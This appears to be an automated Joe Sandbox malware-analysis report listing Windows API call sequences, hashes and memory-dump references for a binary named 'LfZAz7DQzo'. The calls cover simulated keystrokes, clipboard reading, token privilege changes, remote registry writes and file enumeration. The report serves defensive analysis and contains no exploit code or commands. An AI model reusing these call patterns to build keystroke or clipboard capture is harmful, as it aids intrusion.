                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                        • String ID: @GUI_DRAGID$F
                                        • API String ID: 302779176-4164748364
                                        • Opcode ID: 58d0fcc49ab14346b90b66d9839e5053893fdbd36a31efc0000967101da17e19
                                        • Instruction ID: d0c9f227522888484f0c26746cbfb13e6f8ef33665f793e37113122bb624d6d2
                                        • Opcode Fuzzy Hash: 58d0fcc49ab14346b90b66d9839e5053893fdbd36a31efc0000967101da17e19
                                        • Instruction Fuzzy Hash: 2742BB34604345AFDB21CF68C844BAABBE5FF49324F14062DFA99972E1C7319845FB92
                                        APIs
                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F0873F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: %d/%02d/%02d
                                        • API String ID: 3850602802-328681919
                                        • Opcode ID: c102158dea76a06d1763338edcda160edfe1e04ad52c3b4de228786a4c82efd8
                                        • Instruction ID: c0ddcb42909fd4c2ffecbf32f8550b3db070e286716eab80214823d17f250fdc
                                        • Opcode Fuzzy Hash: c102158dea76a06d1763338edcda160edfe1e04ad52c3b4de228786a4c82efd8
                                        • Instruction Fuzzy Hash: 7412C271900208ABEB258F24CC49FAA7BF4EF497A0F144169F955EB2E1DF709946FB10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove$_memset
                                        • String ID: DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                        • API String ID: 1357608183-2202602582
                                        • Opcode ID: bf2f2ed47a1fb01af05ee76deb2fc9c3e1cb5dda1eb798ee98067b5f2fa752e1
                                        • Instruction ID: 6e197104b9b3f1f8a6382eee662455844cd49278733b30b8c96cd713b0745e76
                                        • Opcode Fuzzy Hash: bf2f2ed47a1fb01af05ee76deb2fc9c3e1cb5dda1eb798ee98067b5f2fa752e1
                                        • Instruction Fuzzy Hash: 42938F75A002199BDF24CF68C881BADB7B1FF58314F25916BE955BB390E7709E82CB40
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,?), ref: 00E84A3D
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EBDA8E
                                        • IsIconic.USER32(?), ref: 00EBDA97
                                        • ShowWindow.USER32(?,00000009), ref: 00EBDAA4
                                        • SetForegroundWindow.USER32(?), ref: 00EBDAAE
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EBDAC4
                                        • GetCurrentThreadId.KERNEL32 ref: 00EBDACB
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EBDAD7
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EBDAE8
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EBDAF0
                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EBDAF8
                                        • SetForegroundWindow.USER32(?), ref: 00EBDAFB
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB10
                                        • keybd_event.USER32(00000012,00000000), ref: 00EBDB1B
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB25
                                        • keybd_event.USER32(00000012,00000000), ref: 00EBDB2A
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB33
                                        • keybd_event.USER32(00000012,00000000), ref: 00EBDB38
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB42
                                        • keybd_event.USER32(00000012,00000000), ref: 00EBDB47
                                        • SetForegroundWindow.USER32(?), ref: 00EBDB4A
                                        • AttachThreadInput.USER32(?,?,00000000), ref: 00EBDB71
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 4125248594-2988720461
                                        • Opcode ID: 4a48492040696d2c880dbcd899a75879749ad76e3dc50d3ada39a00b4048c549
                                        • Instruction ID: 1888583dde6f162ba72e6313a87d5e1f03a11dfeca6baeb2bc2c3fe967453231
                                        • Opcode Fuzzy Hash: 4a48492040696d2c880dbcd899a75879749ad76e3dc50d3ada39a00b4048c549
                                        • Instruction Fuzzy Hash: C6316271A4031CBBEB316FA19C89FBF7E6CEB44B50F154025FA04EA1D0D6B15910BBA1
                                        APIs
                                          • Part of subcall function 00ED8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ED8D0D
                                          • Part of subcall function 00ED8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
                                          • Part of subcall function 00ED8CC3: GetLastError.KERNEL32 ref: 00ED8D47
                                        • _memset.LIBCMT ref: 00ED889B
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00ED88ED
                                        • CloseHandle.KERNEL32(?), ref: 00ED88FE
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00ED8915
                                        • GetProcessWindowStation.USER32 ref: 00ED892E
                                        • SetProcessWindowStation.USER32(00000000), ref: 00ED8938
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00ED8952
                                          • Part of subcall function 00ED8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ED8851), ref: 00ED8728
                                          • Part of subcall function 00ED8713: CloseHandle.KERNEL32(?,?,00ED8851), ref: 00ED873A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                        • String ID: $default$winsta0$winsta0\default
                                        • API String ID: 2063423040-1685893292
                                        • Opcode ID: e5a517600e86ffaccafe0fdd76da538a849520071e4100f7d206c6e39b128e1b
                                        • Instruction ID: 87f99a0d29c8ed8d2bf6b74c4e36bb569dcb0faa58535188a741f4b2ee82a304
                                        • Opcode Fuzzy Hash: e5a517600e86ffaccafe0fdd76da538a849520071e4100f7d206c6e39b128e1b
                                        • Instruction Fuzzy Hash: E4814171900209AFDF11DFA4DD45AEEBBB8FF04308F08515AF920BA261DB718E15DB60
                                        APIs
                                        • OpenClipboard.USER32(00F0F910), ref: 00EF4284
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EF4292
                                        • GetClipboardData.USER32(0000000D), ref: 00EF429A
                                        • CloseClipboard.USER32 ref: 00EF42A6
                                        • GlobalLock.KERNEL32(00000000), ref: 00EF42C2
                                        • CloseClipboard.USER32 ref: 00EF42CC
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EF42E1
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00EF42EE
                                        • GetClipboardData.USER32(00000001), ref: 00EF42F6
                                        • GlobalLock.KERNEL32(00000000), ref: 00EF4303
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EF4337
                                        • CloseClipboard.USER32 ref: 00EF4447
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                        • String ID:
                                        • API String ID: 3222323430-0
                                        • Opcode ID: 0373a6f7fa1fdbece47a378b0c81c80a171de3d914d14dbb06b21ae5a32ef7ff
                                        • Instruction ID: b5dc3ed942bb2065ff3e32cea066d7e9e5a714fc40ca34f6f8fb939c96886832
                                        • Opcode Fuzzy Hash: 0373a6f7fa1fdbece47a378b0c81c80a171de3d914d14dbb06b21ae5a32ef7ff
                                        • Instruction Fuzzy Hash: DB519E75204209ABD310FF64DC86F7F77E8BB84B00F105529FA9AE21E1DB70D9099B62
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EEC9F8
                                        • FindClose.KERNEL32(00000000), ref: 00EECA4C
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EECA71
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EECA88
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EECAAF
                                        • __swprintf.LIBCMT ref: 00EECAFB
                                        • __swprintf.LIBCMT ref: 00EECB3E
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                        • __swprintf.LIBCMT ref: 00EECB92
                                          • Part of subcall function 00EA38D8: __woutput_l.LIBCMT ref: 00EA3931
                                        • __swprintf.LIBCMT ref: 00EECBE0
                                          • Part of subcall function 00EA38D8: __flsbuf.LIBCMT ref: 00EA3953
                                          • Part of subcall function 00EA38D8: __flsbuf.LIBCMT ref: 00EA396B
                                        • __swprintf.LIBCMT ref: 00EECC2F
                                        • __swprintf.LIBCMT ref: 00EECC7E
                                        • __swprintf.LIBCMT ref: 00EECCCD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                        • API String ID: 3953360268-2428617273
                                        • Opcode ID: 18701ff3ec2d65abaa4760f7da346ba09d4df9a98f736048e53eda0575c74f0d
                                        • Instruction ID: 5a4198adccaa6cd97799ed22ede643735c95b484818e36ab1aaedba7bbadb255
                                        • Opcode Fuzzy Hash: 18701ff3ec2d65abaa4760f7da346ba09d4df9a98f736048e53eda0575c74f0d
                                        • Instruction Fuzzy Hash: 0FA15FB2508304ABC714FB64C985DAFB7ECFF94704F441929B58AE6192EB34DA09C762
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EEF221
                                        • _wcscmp.LIBCMT ref: 00EEF236
                                        • _wcscmp.LIBCMT ref: 00EEF24D
                                        • GetFileAttributesW.KERNEL32(?), ref: 00EEF25F
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00EEF279
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EEF291
                                        • FindClose.KERNEL32(00000000), ref: 00EEF29C
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00EEF2B8
                                        • _wcscmp.LIBCMT ref: 00EEF2DF
                                        • _wcscmp.LIBCMT ref: 00EEF2F6
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EEF308
                                        • SetCurrentDirectoryW.KERNEL32(00F3A5A0), ref: 00EEF326
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEF330
                                        • FindClose.KERNEL32(00000000), ref: 00EEF33D
                                        • FindClose.KERNEL32(00000000), ref: 00EEF34F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1803514871-438819550
                                        • Opcode ID: ecb01c9bd1726afdcaccbc2b539c689a56225ca3e42bb1322a9afacc21bf3f0f
                                        • Instruction ID: 8620b8b08cecb85b6ac0783c1c0ab7fedf78d9d477a69db8037cc0ef1158e1d5
                                        • Opcode Fuzzy Hash: ecb01c9bd1726afdcaccbc2b539c689a56225ca3e42bb1322a9afacc21bf3f0f
                                        • Instruction Fuzzy Hash: 8131E47660025D6ADF20DBB5DC48ADE73ACAF49364F141176F914F30A0EB30DA89DA50
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00BDE
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F0F910,00000000,?,00000000,?,?), ref: 00F00C4C
                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F00C94
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F00D1D
                                        • RegCloseKey.ADVAPI32(?), ref: 00F0103D
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F0104A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Close$ConnectCreateRegistryValue
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 536824911-966354055
                                        • Opcode ID: a81da01c481be3c873b5af4573ded4a021dd0ad07be562b548e33bd405435554
                                        • Instruction ID: 79474e1f3472d7ec7101a038b8b8c6f0edae2421f264be0a9a75d8ab44c81c9b
                                        • Opcode Fuzzy Hash: a81da01c481be3c873b5af4573ded4a021dd0ad07be562b548e33bd405435554
                                        • Instruction Fuzzy Hash: 970260756006119FCB14EF14C895E2AB7E5FF89724F04985DF98AAB3A2CB30ED41DB81
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • DragQueryPoint.SHELL32(?,?), ref: 00F0C917
                                          • Part of subcall function 00F0ADF1: ClientToScreen.USER32(?,?), ref: 00F0AE1A
                                          • Part of subcall function 00F0ADF1: GetWindowRect.USER32(?,?), ref: 00F0AE90
                                          • Part of subcall function 00F0ADF1: PtInRect.USER32(?,?,00F0C304), ref: 00F0AEA0
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F0C980
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F0C98B
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F0C9AE
                                        • _wcscat.LIBCMT ref: 00F0C9DE
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F0C9F5
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F0CA0E
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00F0CA25
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00F0CA47
                                        • DragFinish.SHELL32(?), ref: 00F0CA4E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00F0CB41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                        • API String ID: 2166380349-3440237614
                                        • Opcode ID: 374a4a66c9cf33da5e6d34a05e56d593bd7588c79377f4566dd57d217153599a
                                        • Instruction ID: 6f5e36d71243332dfc8b052e1392a87e0342844e8d7fa0d1c10120c2d51a5046
                                        • Opcode Fuzzy Hash: 374a4a66c9cf33da5e6d34a05e56d593bd7588c79377f4566dd57d217153599a
                                        • Instruction Fuzzy Hash: 1D616B71108305AFC711EF64CC85D9BBBE8FF89710F400A1EF599A21A1DB70DA49EB92
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EEF37E
                                        • _wcscmp.LIBCMT ref: 00EEF393
                                        • _wcscmp.LIBCMT ref: 00EEF3AA
                                          • Part of subcall function 00EE45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EE45DC
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EEF3D9
                                        • FindClose.KERNEL32(00000000), ref: 00EEF3E4
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00EEF400
                                        • _wcscmp.LIBCMT ref: 00EEF427
                                        • _wcscmp.LIBCMT ref: 00EEF43E
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EEF450
                                        • SetCurrentDirectoryW.KERNEL32(00F3A5A0), ref: 00EEF46E
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEF478
                                        • FindClose.KERNEL32(00000000), ref: 00EEF485
                                        • FindClose.KERNEL32(00000000), ref: 00EEF497
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 1824444939-438819550
                                        • Opcode ID: a7f3e8003fdc38652d13602ad0ecf627009f941c4c2ad4470129daf110d353b5
                                        • Instruction ID: 02b5f8e9c95f980c31f8b448663fcd1db4df6cba1ea19161d456bd80dd9cf34c
                                        • Opcode Fuzzy Hash: a7f3e8003fdc38652d13602ad0ecf627009f941c4c2ad4470129daf110d353b5
                                        • Instruction Fuzzy Hash: 8531B57250125D6ACB20AB75EC88ADF77ACAF49364F141175F850F30E1E730DA49DA54
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F0C4EC
                                        • GetFocus.USER32 ref: 00F0C4FC
                                        • GetDlgCtrlID.USER32(00000000), ref: 00F0C507
                                        • _memset.LIBCMT ref: 00F0C632
                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F0C65D
                                        • GetMenuItemCount.USER32(?), ref: 00F0C67D
                                        • GetMenuItemID.USER32(?,00000000), ref: 00F0C690
                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F0C6C4
                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F0C70C
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F0C744
                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00F0C779
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                        • String ID: 0
                                        • API String ID: 3616455698-4108050209
                                        • Opcode ID: ba55ef540e2693c7c239e067dbddc5de526a21c6e8e6da4f0d991642b440b36b
                                        • Instruction ID: db70fa38e133de0bb1f2ba39c188ee14472b49c1244fe835872005b805ac4c44
                                        • Opcode Fuzzy Hash: ba55ef540e2693c7c239e067dbddc5de526a21c6e8e6da4f0d991642b440b36b
                                        • Instruction Fuzzy Hash: 42818C756083059FD720DF14C884A6BBBE8FB89324F04062DF99997291D771E905FBA2
                                        APIs
                                          • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
                                          • Part of subcall function 00ED874A: GetLastError.KERNEL32(?,00ED822A,?,?,?), ref: 00ED8770
                                          • Part of subcall function 00ED874A: GetProcessHeap.KERNEL32(00000008,?,?,00ED822A,?,?,?), ref: 00ED877F
